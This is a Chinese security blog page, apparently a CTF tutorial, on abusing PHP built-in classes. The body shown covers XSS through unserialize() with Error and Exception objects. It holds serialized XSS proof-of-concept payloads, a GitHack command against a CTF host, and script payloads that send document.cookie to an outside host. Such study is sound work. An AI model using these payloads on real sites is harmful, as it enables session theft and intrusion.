<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="RoboTerh"><meta name="copyright" content="RoboTerh"><meta name="generator" content="Hexo 5.4.0"><meta name="theme" content="hexo-theme-yun"><title>PHP内置类 | RoboTerh</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.25/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_dxory92pb0h.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"roboterh.github.io","root":"/","title":["ROBO","TERH","BLOG","小站"],"version":"1.7.0","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}.","hits":"${hits} results found","hits_time":"${hits} results found in ${time} ms"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><script>CONFIG.leancloudVisitors = {"enable":true,"app_id":"QzEMTRDcJM476WmFbFsyqtOV-MdYXbMMI","app_key":"Ovrs8D1mvkchhDyViQ6oVoQq","server_url":"https://roboterh.github.io"}</script><script defer src="/js/analytics/leancloud-visitors.js"></script><meta name="description" content="原生类 Error Exception SoapClient Directorylterator SimpleXMLElement  Error&#x2F;Exception内置类的使用XSSError类条件：  php7版本 开启报错  Error类是一个php的内置类，用于自定义一个Error，内置有一个__toString()方法，如果把他作为字符串使用的时候就会触发这个方法:echo &lt;obj">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP内置类">
<meta property="og:url" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/index.html">
<meta property="og:site_name" content="RoboTerh">
<meta property="og:description" content="原生类 Error Exception SoapClient Directorylterator SimpleXMLElement  Error&#x2F;Exception内置类的使用XSSError类条件：  php7版本 开启报错  Error类是一个php的内置类，用于自定义一个Error，内置有一个__toString()方法，如果把他作为字符串使用的时候就会触发这个方法:echo &lt;obj">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/1.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/2.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/3.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/4.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/5.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/6.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/7.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/8.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/9.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/10.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/11.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/12.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/13.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/14.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/15.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/16.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/17.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/18.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/19.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/20.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/21.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/22.png">
<meta property="og:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/23.png">
<meta property="article:published_time" content="2021-12-03T04:54:30.000Z">
<meta property="article:modified_time" content="2021-12-11T09:18:18.520Z">
<meta property="article:author" content="RoboTerh">
<meta property="article:tag" content="PHP技巧">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/1.png"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="Table of Contents"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="Overview"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="RoboTerh"><img width="96" loading="lazy" src="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/8@XK~G6IIG(3~I6J~C6M4JB.png" alt="RoboTerh"><span class="site-author-status" title="wwww我好菜">-_-</span></a><div class="site-author-name"><a href="/about/">RoboTerh</a></div><span class="site-name">RoboTerh</span><sub class="site-subtitle"></sub><div class="site-desciption">无聊的时候记录记录自己的学习啊</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="Home"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="Archives"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">50</span></a></div><div class="site-state-item"><a href="/categories/" title="Categories"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">16</span></a></div><div class="site-state-item"><a href="/tags/" title="Tags"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">37</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/F0A770ED0C75BC233DA1034B4C80E8DA.png" title="QQ" target="_blank" style="color:#181717"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:2865153524@qq.com" title="E-Mail" target="_blank" style="color:8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%94%9F%E7%B1%BB"><span class="toc-number">1.</span> <span class="toc-text">原生类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Error-Exception%E5%86%85%E7%BD%AE%E7%B1%BB%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">Error&#x2F;Exception内置类的使用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#XSS"><span class="toc-number">2.0.1.</span> <span class="toc-text">XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#Error%E7%B1%BB"><span class="toc-number">2.0.1.1.</span> <span class="toc-text">Error类</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#Exception%E7%B1%BB"><span class="toc-number">2.0.1.2.</span> <span class="toc-text">Exception类</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-number">2.0.1.3.</span> <span class="toc-text">例题</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E5%93%88%E5%B8%8C%E6%AF%94%E8%BE%83"><span class="toc-number">2.0.2.</span> <span class="toc-text">绕过哈希比较</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#Error-Exception%E7%B1%BB"><span class="toc-number">2.0.2.1.</span> <span class="toc-text">Error&#x2F;Exception类</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-1"><span class="toc-number">2.0.2.2.</span> <span class="toc-text">例题</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8SoapClient%E7%B1%BBSSRF"><span class="toc-number">3.</span> <span class="toc-text">利用SoapClient类SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#SoapClient%E7%B1%BB%E5%AD%A6%E4%B9%A0"><span class="toc-number">3.0.0.1.</span> <span class="toc-text">SoapClient类学习</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#SSRF%E6%B5%8B%E8%AF%95"><span class="toc-number">3.0.0.2.</span> <span class="toc-text">SSRF测试</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-2"><span class="toc-number">3.0.0.3.</span> <span class="toc-text">例题</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87open-basedir"><span class="toc-number">4.</span> <span class="toc-text">绕过open_basedir</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8DirectoryIterator%E7%B1%BB%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="toc-number">4.0.1.</span> <span class="toc-text">使用DirectoryIterator类目录遍历</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95"><span class="toc-number">4.0.1.1.</span> <span class="toc-text">测试</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8FilesystemIterator%E7%B1%BB%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="toc-number">4.0.2.</span> <span class="toc-text">使用FilesystemIterator类目录遍历</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E7%94%A8%E6%B3%95"><span class="toc-number">4.0.2.1.</span> <span class="toc-text">用法</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8GlobIterator%E7%B1%BB%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="toc-number">4.0.3.</span> <span class="toc-text">使用GlobIterator类目录遍历</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E7%94%A8%E6%B3%95-1"><span class="toc-number">4.0.3.1.</span> <span class="toc-text">用法</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8SplFileObject%E7%B1%BB%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="toc-number">4.0.4.</span> <span class="toc-text">使用SplFileObject类读取文件</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95-1"><span class="toc-number">4.0.4.1.</span> <span class="toc-text">测试</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%9D%9E%E5%8E%9F%E7%94%9F%E7%B1%BB%E8%AF%BB%E5%8F%96open-basedir%E9%99%90%E5%88%B6%E6%96%87%E4%BB%B6"><span class="toc-number">4.0.5.</span> <span class="toc-text">非原生类读取open_basedir限制文件</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#ini-set-%E7%9B%B8%E5%AF%B9%E8%B7%AF%E5%BE%84%E8%AF%BB%E5%8F%96"><span class="toc-number">4.0.5.1.</span> <span class="toc-text">ini_set() + 相对路径读取</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#shell%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C"><span class="toc-number">4.0.5.2.</span> <span class="toc-text">shell命令执行读取文件操作</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#symlink-%E8%BD%AF%E9%93%BE%E6%8E%A5"><span class="toc-number">4.0.5.3.</span> <span class="toc-text">symlink()软链接</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">5.</span> <span class="toc-text">XXE漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#SimpleXMLElement"><span class="toc-number">5.0.1.</span> <span class="toc-text">SimpleXMLElement</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A0%E9%99%A4%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8"><span class="toc-number">6.</span> <span class="toc-text">删除文件利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A9%E7%94%A8ZipArchive%E7%B1%BB%E8%BF%9B%E8%A1%8C%E5%88%A0%E9%99%A4"><span class="toc-number">6.0.1.</span> <span class="toc-text">利用ZipArchive类进行删除</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E8%A7%A3%E9%87%8A"><span class="toc-number">6.0.1.1.</span> <span class="toc-text">参数解释</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Reflection%E7%9A%84%E5%A6%99%E7%94%A8"><span class="toc-number">7.</span> <span class="toc-text">Reflection的妙用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6"><span class="toc-number">8.</span> <span class="toc-text">未完待续……………………</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://RoboTerh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="RoboTerh"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="RoboTerh"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">PHP内置类</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="Created: 2021-12-03 12:54:30" itemprop="dateCreated datePublished" datetime="2021-12-03T12:54:30+08:00">2021-12-03</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-2-line"></use></svg></span> <time title="Modified: 2021-12-11 17:18:18" itemprop="dateModified" datetime="2021-12-11T17:18:18+08:00">2021-12-11</time></div><span class="leancloud_visitors" id="/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/" data-flag-title="PHP内置类"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="Views"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/web%E5%AE%89%E5%85%A8/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">web安全</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/PHP%E6%8A%80%E5%B7%A7/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">PHP技巧</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#0078E7;"><h3 id="原生类"><a href="#原生类" class="headerlink" title="原生类"></a>原生类</h3><ul>
<li>Error</li>
<li>Exception</li>
<li>SoapClient</li>
<li>Directorylterator</li>
<li>SimpleXMLElement</li>
</ul>
<h3 id="Error-Exception内置类的使用"><a href="#Error-Exception内置类的使用" class="headerlink" title="Error/Exception内置类的使用"></a>Error/Exception内置类的使用</h3><h5 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h5><h6 id="Error类"><a href="#Error类" class="headerlink" title="Error类"></a>Error类</h6><p><strong>条件</strong>：</p>
<ul>
<li>php7版本</li>
<li>开启报错</li>
</ul>
<p>Error类是一个php的内置类，用于自定义一个Error，内置有一个<code>__toString()</code>方法，如果把他作为字符串使用的时候就会触发这个方法:<code>echo &lt;object&gt;</code>类似这种</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//test.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$str</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>很明显是一个反序列化问题，但是没有可以利用的<code>魔术方法</code></p>
<p>我们使用<code>Error类</code>触发其中的<code>__toString()</code>方法</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//POC
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Error</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;script>alert("</span>xss_successful<span class="token string double-quoted-string">")&lt;/script>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">//O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A40%3A%22%3Cscript%3Ealert%28%27xss_successful%27%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A37%3A%22D%3A%5Cphpstudy%5CPHPTutorial%5CWWW%5Ctest1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>GET传参：成功执行js</p>
<p><img src="1.png" loading="lazy"></p>
<h6 id="Exception类"><a href="#Exception类" class="headerlink" title="Exception类"></a>Exception类</h6><p><strong>条件</strong>：</p>
<ul>
<li>php5/php7版本</li>
<li>开启报错</li>
</ul>
<p>同样具有<code>__toString()</code>魔术方法</p>
<p>测试：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$str</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>POC:</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;script>alert('xss_successful')&lt;/script>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
//O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A40%3A%22%3Cscript%3Ealert%28%27xss_successful%27%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A37%3A%22D%3A%5Cphpstudy%5CPHPTutorial%5CWWW%5Ctest1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>GET传参</p>
<p><img src="2.png" loading="lazy"></p>
<p>成功执行</p>
<h6 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h6><p>xss之光</p>
<p>打开题目就是<code>gungungun</code></p>
<p><img src="3.png" loading="lazy"></p>
<p>我们进行信息收集，发现了git泄露</p>
<p><code>python2 GitHack.py http://b4c894c7-cf52-4dc3-8a2e-4438d75072ab.node4.buuoj.cn/.git/</code></p>
<p><img src="4.png" loading="lazy"></p>
<p>得到index.php</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//index.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'yds_is_so_beautiful'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>很明显有一个<code>unserialize()</code>函数，但是没有魔术方法可以利用，我们可以想到使用PHP内置类，通过<code>echo</code>来触发内置类中的<code>__toString()</code>魔术方法来实现反序列化</p>
<p>而且可以观察到<code>X-Powered-By</code>字段泄露了使用了php5版本</p>
<p>所以我们使用<code>Exception()</code>内置类进行xss</p>
<p>我们使用xss将cookie带出来</p>
<ul>
<li>使用<code>window.open()</code>打开新窗口的方法带出cookie</li>
<li>使用<code>window.location.href=&#39;url&#39;</code>实现恶意跳转带出cookie</li>
<li>使用<code>alert(document.cookie)</code>通过弹窗弹出cookie</li>
</ul>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//payload
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;script>window.open('http://b4c894c7-cf52-4dc3-8a2e-4438d75072ab.node4.buuoj.cn/?'+document.cookie);&lt;/script>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
    
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;script>window.location.href='http://4359bb0c-611c-4df8-a0e5-2545a73fc9fd.node4.buuoj.cn:81/?'+document.cookie&lt;/script>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
 
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;script>alert(document.cookie)&lt;/script>"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
//如果开启了httponly是不能够成功的<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>效果：</p>
<p><img src="5.png" loading="lazy"></p>
